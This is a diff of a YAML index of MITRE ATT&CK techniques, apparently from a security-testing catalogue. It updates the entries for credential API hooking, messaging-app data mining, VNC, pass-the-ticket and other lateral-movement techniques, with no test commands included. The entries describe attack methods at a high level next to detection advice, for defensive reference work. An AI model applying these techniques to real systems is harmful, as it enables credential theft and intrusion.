-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -41835,6 +42522,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -41844,7 +42532,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -41860,66 +42547,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -41944,11 +42632,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -41971,9 +42659,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -42024,7 +42711,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -42088,7 +42774,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -42159,7 +42844,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -42196,7 +42880,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -42227,8 +42911,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -42311,12 +42993,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -42343,6 +43024,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42360,12 +43042,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -42391,14 +43073,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -42516,7 +43197,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -42570,11 +43250,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42626,14 +43305,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -42719,12 +43397,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42744,6 +43421,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -42751,7 +43429,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -42767,39 +43444,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42824,12 +43502,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -42843,13 +43520,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -42866,7 +43542,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42914,7 +43590,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -42947,7 +43623,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -42986,7 +43661,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -43020,12 +43695,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -43053,10 +43726,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -43086,7 +43758,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
